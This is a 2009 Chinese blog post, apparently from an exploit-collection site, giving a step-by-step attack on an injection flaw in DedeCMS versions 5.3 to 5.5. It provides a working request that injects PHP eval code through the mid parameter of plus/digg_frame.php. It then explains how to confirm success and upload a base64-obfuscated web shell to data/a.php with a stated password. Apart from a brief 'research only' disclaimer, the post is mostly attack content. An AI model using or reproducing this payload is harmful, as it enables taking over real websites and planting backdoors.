20091001 dedecms 0day!!

2009, October 28, 2:40 PM. 漏洞集研
Submitted by admin

dedecms最新注入漏洞影响版本5.3-5.5
dedecms5.3和5.5系列版本存在重大注入漏洞,请注意以下操作有攻击性,仅供研究。利用此漏洞进行违法活动者,后果自负。

假设域名是:www.abc.com 攻击步骤如下:
1. 访问网址:
http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
可看见以下错误信息 
大小: 40.79 K
尺寸: 500 x 180
浏览: 50 次
点击打开新窗口浏览全图

2. 访问http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. test.html(源码在下面),注意 form 中 action 的地址是

<form action=http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>

按确定后的看到第2步骤的信息表示文件木马上传成功。

木马网址http://www.abc.com/data/a.php
密码:2006888
  文件中自带了一个脚本木马 作者使用base64做了处理  基本免杀  但不能保证留有后门!

test.html源码文件

 dedecms.txt

Tags: dedecms

« 上一篇 | 下一篇 »

只显示10条记录相关文章
DeDecms xss 通杀0day 附getshell EXP (浏览: 27865, 评论: 0)
“幸福百相园”相册GETSHELL漏洞 (浏览: 35446, 评论: 0)
dedecms默认的注册用户 (浏览: 12969, 评论: 0)
dede织梦的又一个代码执行0day (浏览: 13763, 评论: 0)
分享一个判断dedecms版本的方法 (浏览: 16392, 评论: 0)
dedecms v5.3-v5.6 Get Shell 0day利用分析 (浏览: 37601, 评论: 0)
DEDE 暴文件源码AND获得后门GetShell漏洞 (浏览: 22241, 评论: 0)
dedecms 5.6 RSS订阅页面注入漏洞 (浏览: 11172, 评论: 0)
这难道就是传说中的:dedecms 5.6的最新注入漏洞 (浏览: 10280, 评论: 0)
DedeCmsV5.6 本地包含 鸡助0day (浏览: 18108, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):